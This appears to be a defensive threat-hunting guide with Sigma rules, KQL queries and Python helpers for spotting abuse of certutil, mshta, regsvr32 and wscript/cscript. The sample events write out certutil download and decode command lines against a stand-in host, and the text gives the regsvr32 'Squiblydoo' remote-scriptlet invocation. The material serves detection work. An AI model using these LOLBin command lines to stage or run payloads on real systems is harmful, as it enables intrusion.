Why LOLBins Matter
Living-off-the-land binaries (LOLBins) are legitimate, Microsoft-signed system tools that adversaries abuse to execute code, download files, and establish persistence. The appeal is obvious: they’re present on every Windows endpoint, they’re signed by Microsoft, and many organizations don’t have detection coverage for their malicious usage patterns.
The challenge in hunting LOLBins is separating the signal from the enormous noise of legitimate use. certutil.exe manages certificates legitimately. regsvr32.exe registers COM objects legitimately. The key is understanding what malicious invocations look like versus the baseline.
Pre-Hunt Baseline Questions
Before starting, answer these questions about your environment:
- Do administrators use certutil for certificate management? From which hosts?
- Is mshta.exe used by any legitimate software in your environment?
- What directories do legitimate scripts (.vbs, .js) run from?
- Which accounts normally invoke wscript/cscript?
Build exclusions around the answers. Don’t start hunting without understanding your baseline — you’ll drown in false positives. Record the baseline (hosts, accounts, parent processes, script directories) somewhere you can reference when tuning the rules below.
Hunt 1: certutil.exe Abuse
certutil.exe can decode base64 files and download URLs — both heavily abused for payload staging.
Sigma Rule — certutil URL Download
title: CertUtil Download or Decode Abuse
id: 19b08b1b-0e3a-4b3d-a2d1-c0abcd123456
status: stable
description: Detects certutil used to download files from URLs or decode base64
references:
    - https://attack.mitre.org/techniques/T1218/
    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/
author: SOC Analyst Hub
tags:
    - attack.execution
    - attack.t1218
    - attack.defense_evasion
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\certutil.exe'
        CommandLine|contains:
            - '-urlcache'
            - '-decode'
            - '-encode'
            - '-decodehex'
            - 'http://'
            - 'https://'
            - 'ftp://'
    filter_legitimate:
        CommandLine|contains:
            - 'DisplayDefaultCertificates'
            - '-v'      # substring match: also suppresses -verify and similar; tune against your baseline
            - '-store'
            - '-user'
    condition: selection and not filter_legitimate
falsepositives:
    - Legitimate certificate management operations
    - PKI administration scripts
level: high
KQL Hunt Query
DeviceProcessEvents
// =~ is case-insensitive; FileName may be logged as CertUtil.exe
| where FileName =~ "certutil.exe"
| where ProcessCommandLine has_any ("-urlcache", "-decode", "-encode", "http://", "https://", "ftp://")
| project Timestamp, DeviceName, AccountName, ProcessCommandLine, InitiatingProcessFileName
| sort by Timestamp desc
Pivot points when you find a hit: What file was downloaded/decoded? Is it still on disk? Check for subsequent execution of the decoded file within 5 minutes using the same process ancestry.
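To sanity-check the rule logic before deploying it, the following added example (not from the original post) evaluates the certutil rule's `selection and not filter_legitimate` condition over constructed process-creation events, using Sigma's default case-insensitive substring and suffix matching:

```python
from typing import Dict, List

# Matching lists transcribed from the certutil Sigma rule above
SELECTION_IMAGE_SUFFIX = "\\certutil.exe"
SELECTION_CMD = ["-urlcache", "-decode", "-encode", "-decodehex",
                 "http://", "https://", "ftp://"]
FILTER_CMD = ["DisplayDefaultCertificates", "-v", "-store", "-user"]


def contains_any(value: str, needles: List[str]) -> bool:
    # Sigma string modifiers match case-insensitively by default
    lowered = value.lower()
    return any(n.lower() in lowered for n in needles)


def certutil_rule_matches(event: Dict[str, str]) -> bool:
    """Evaluate 'selection and not filter_legitimate' for one process event."""
    image = event.get("Image", "").lower()
    cmd = event.get("CommandLine", "")
    selection = (image.endswith(SELECTION_IMAGE_SUFFIX)
                 and contains_any(cmd, SELECTION_CMD))
    filter_legitimate = contains_any(cmd, FILTER_CMD)
    return selection and not filter_legitimate


# Constructed sample events (hypothetical, not real telemetry)
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://example.invalid/a.txt C:\Users\Public\a.txt"},
    {"Image": r"C:\Windows\System32\certutil.exe",      # benign store query, filtered out
     "CommandLine": "certutil.exe -store -user My"},
    {"Image": r"C:\Windows\System32\CertUtil.exe",      # mixed case must still match
     "CommandLine": r"CertUtil.exe -decode C:\Users\Public\p.b64 C:\Users\Public\p.exe"},
    {"Image": r"C:\Windows\System32\cmd.exe",           # not certutil: a URL alone is not enough
     "CommandLine": "cmd.exe /c echo http://example.invalid"},
]


def hunt(events: List[Dict[str, str]]) -> List[str]:
    """Return the command lines the rule would alert on."""
    return [e["CommandLine"] for e in events if certutil_rule_matches(e)]


if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print("ALERT:", hit)
```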
Hunt 2: mshta.exe Abuse
mshta.exe (Microsoft HTML Application Host) executes HTA files and inline VBScript/JavaScript via the javascript: and vbscript: URI handlers. Attackers use it to execute payloads that bypass AppLocker (HTA files run with the trust of a signed binary).
Sigma Rule — mshta Inline Execution
title: Mshta Inline Script or Remote HTA Execution
id: 2c3d4e5f-6789-0abc-def1-234567890abc
status: stable
description: Detects mshta executing inline scripts or remote HTA files
tags:
    - attack.execution
    - attack.t1218.005
logsource:
    category: process_creation
    product: windows
detection:
    selection_inline:
        Image|endswith: '\mshta.exe'
        CommandLine|contains:
            - 'javascript:'
            - 'vbscript:'
            - 'about:blank'
    selection_remote:
        Image|endswith: '\mshta.exe'
        CommandLine|contains:
            - 'http://'
            - 'https://'
            - 'ftp://'
            - '\\\\'    # UNC path (two literal backslashes in Sigma escaping)
    selection_suspicious_parent:
        Image|endswith: '\mshta.exe'
        ParentImage|endswith:
            - '\winword.exe'
            - '\excel.exe'
            - '\powerpnt.exe'
            - '\outlook.exe'
            - '\cmd.exe'
    condition: selection_inline or selection_remote or selection_suspicious_parent
level: high
Key indicator: mshta spawned by Office applications strongly suggests a malicious macro or document exploit delivering an HTA payload.
Hunt 3: regsvr32 “Squiblydoo” Abuse
The “Squiblydoo” technique uses regsvr32.exe /s /n /u /i:<url> scrobj.dll to download and execute arbitrary COM scriptlets. It’s been in active use since 2016 and remains effective against environments without application control.
Sigma Rule — regsvr32 Remote Scriptlet Execution
title: Regsvr32 Squiblydoo Remote Scriptlet Execution
id: 3d4e5f60-7891-0bcd-ef12-345678901bcd
status: stable
description: Detects regsvr32 loading remote scriptlets via scrobj.dll
tags:
    - attack.defense_evasion
    - attack.t1218.010
logsource:
    category: process_creation
    product: windows
detection:
    selection_scrobj:
        Image|endswith: '\regsvr32.exe'
        CommandLine|contains:
            - 'scrobj.dll'
            - 'scrobj'
    selection_remote:
        Image|endswith: '\regsvr32.exe'
        CommandLine|contains:
            - 'http://'
            - 'https://'
            - '/i:'
    condition: selection_scrobj or selection_remote
falsepositives:
    - Legitimate COM object registration (no network download involved)
level: high
Network Pivot for regsvr32
// Find regsvr32 processes that made outbound connections.
// DeviceNetworkEvents identifies the originating process as InitiatingProcessId,
// and DeviceProcessEvents stores the command line as ProcessCommandLine.
DeviceNetworkEvents
| where RemotePort in (80, 443, 8080, 8443)
| join kind=inner (
    DeviceProcessEvents
    | where FileName =~ "regsvr32.exe"
    | project DeviceId, ProcessId, ProcessCommandLine
  ) on DeviceId, $left.InitiatingProcessId == $right.ProcessId
// ProcessIds are reused over time; narrow the time range if the hunt window is long
| project Timestamp, DeviceName, ProcessCommandLine, RemoteIP, RemotePort, RemoteUrl
Hunt 4: wscript.exe and cscript.exe
Windows Script Host (wscript/cscript) executes .vbs, .js, and .wsf files — frequently abused in phishing chains where a document drops a script that downloads and executes a second-stage payload.
Sigma Rule — Script Execution from Suspicious Paths
title: Windows Script Host Executing From Suspicious Location
id: 4e5f6071-8902-1cde-f123-456789012cde
status: stable
tags:
    - attack.execution
    - attack.t1059.005
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith:
            - '\wscript.exe'
            - '\cscript.exe'
        CommandLine|contains:
            - '\AppData\Local\Temp\\'
            - '\AppData\Roaming\\'
            - '\Users\Public\\'
            - 'C:\Windows\Temp\\'
            - '\Downloads\\'
    filter_legitimate:
        CommandLine|contains:
            - 'C:\Program Files\\'
            - 'C:\Program Files (x86)\\'
    condition: selection and not filter_legitimate
level: high
Parent Process Hunting
Scripts delivered via phishing are usually executed with an Office application or a browser as the parent. This is one of the highest-fidelity LOLBin signals available:
DeviceProcessEvents
// in~ is case-insensitive, matching however the endpoint logs the file name
| where FileName in~ ("wscript.exe", "cscript.exe")
| where InitiatingProcessFileName in~ (
    "winword.exe", "excel.exe", "powerpnt.exe",
    "outlook.exe", "msaccess.exe",
    "chrome.exe", "msedge.exe", "firefox.exe"
  )
| project Timestamp, DeviceName, AccountName,
    InitiatingProcessFileName, ProcessCommandLine
| sort by Timestamp desc
Correlation Hunt: The Full Kill Chain
LOLBin abuse rarely happens in isolation. The full kill chain typically looks like:
- User opens malicious document (Office process) or downloads a file (browser process)
- LOLBin spawned by Office/browser parent
- LOLBin makes outbound HTTP/S connection
- Second-stage binary written to temp directory
- Second-stage executed (often via another LOLBin or PowerShell)
// Chain: Office parent → LOLBin → network → file write
let lolbins = dynamic(["certutil.exe", "mshta.exe", "regsvr32.exe", "wscript.exe", "cscript.exe", "rundll32.exe"]);
let office_apps = dynamic(["winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"]);
DeviceProcessEvents
| where FileName in~ (lolbins)
| where InitiatingProcessFileName in~ (office_apps)
// DeviceProcessEvents exposes the command line as ProcessCommandLine
| project LolbinTime = Timestamp, DeviceName, AccountName,
    LOLBin = FileName, ProcessId,
    OfficeParent = InitiatingProcessFileName,
    ProcessCommandLine
When you find matches, pivot to DeviceNetworkEvents and DeviceFileEvents on the same DeviceName and ProcessId within a 5-minute window to see the full picture.
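The pivot described above, as an added example that is not part of the original post: a small correlator that links Office-spawned LOLBins to the network connections and file writes the same DeviceName + ProcessId made within the 5-minute window. Column names mirror the MDE tables used in the queries; the telemetry is constructed.

```python
from datetime import datetime, timedelta
from typing import Dict, List

LOLBINS = {"certutil.exe", "mshta.exe", "regsvr32.exe", "wscript.exe", "cscript.exe", "rundll32.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
WINDOW = timedelta(minutes=5)  # the 5-minute pivot window from the text

def correlate_chains(process_events, network_events, file_events) -> List[Dict]:
    """For each Office-spawned LOLBin, collect the network connections and file writes
    made by the same DeviceName + ProcessId within WINDOW of the LOLBin's start."""
    chains = []
    for p in process_events:
        if (p["FileName"].lower() not in LOLBINS
                or p["InitiatingProcessFileName"].lower() not in OFFICE_APPS):
            continue
        key = (p["DeviceName"], p["ProcessId"])
        start = datetime.fromisoformat(p["Timestamp"])

        def in_window(e: Dict) -> bool:  # same device + process, inside the window
            when = datetime.fromisoformat(e["Timestamp"])
            return (e["DeviceName"], e["InitiatingProcessId"]) == key and start <= when <= start + WINDOW

        net = [e["RemoteUrl"] for e in network_events if in_window(e)]
        files = [e["FileName"] for e in file_events if in_window(e)]
        chains.append({"device": p["DeviceName"], "parent": p["InitiatingProcessFileName"],
                       "lolbin": p["FileName"], "network": net, "files": files,
                       # parent->LOLBin counts as two stages; network and file write add one each
                       "stages": 2 + (1 if net else 0) + (1 if files else 0)})
    return chains

# Constructed sample telemetry (hypothetical); column names mirror the MDE tables
PROCESS_EVENTS = [
    {"Timestamp": "2024-05-01T10:00:00", "DeviceName": "WS01", "ProcessId": 4242,
     "FileName": "mshta.exe", "InitiatingProcessFileName": "WINWORD.EXE"},
    {"Timestamp": "2024-05-01T10:03:00", "DeviceName": "WS02", "ProcessId": 5150,
     "FileName": "certutil.exe", "InitiatingProcessFileName": "cmd.exe"},  # no Office parent
]
NETWORK_EVENTS = [
    {"Timestamp": "2024-05-01T10:00:30", "DeviceName": "WS01", "InitiatingProcessId": 4242,
     "RemoteUrl": "http://example.invalid/stage2"},
    {"Timestamp": "2024-05-01T10:09:00", "DeviceName": "WS01", "InitiatingProcessId": 4242,
     "RemoteUrl": "http://example.invalid/late"},  # outside the 5-minute window
]
FILE_EVENTS = [
    {"Timestamp": "2024-05-01T10:01:00", "DeviceName": "WS01", "InitiatingProcessId": 4242,
     "FileName": "update.exe", "FolderPath": r"C:\Users\Public"},
]
```

A chain with all four stages present is the one to escalate first; a two-stage hit (Office parent only) still merits a look but is where your documented baseline does most of the filtering.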
Building Long-Term Detection
After hunting, convert your most valuable queries into scheduled detections:
- Identify the highest-fidelity indicators (Office → LOLBin parent chains are almost always malicious)
- Tune out the legitimate baseline you documented pre-hunt
- Convert to Sigma with an appropriate level (Office → LOLBin = critical; LOLBin from temp = high; raw LOLBin execution = medium)
- Deploy and set response SLAs based on level
LOLBin detections are some of the most valuable to maintain — they cover initial access, execution, and defense evasion across a huge range of threat actors.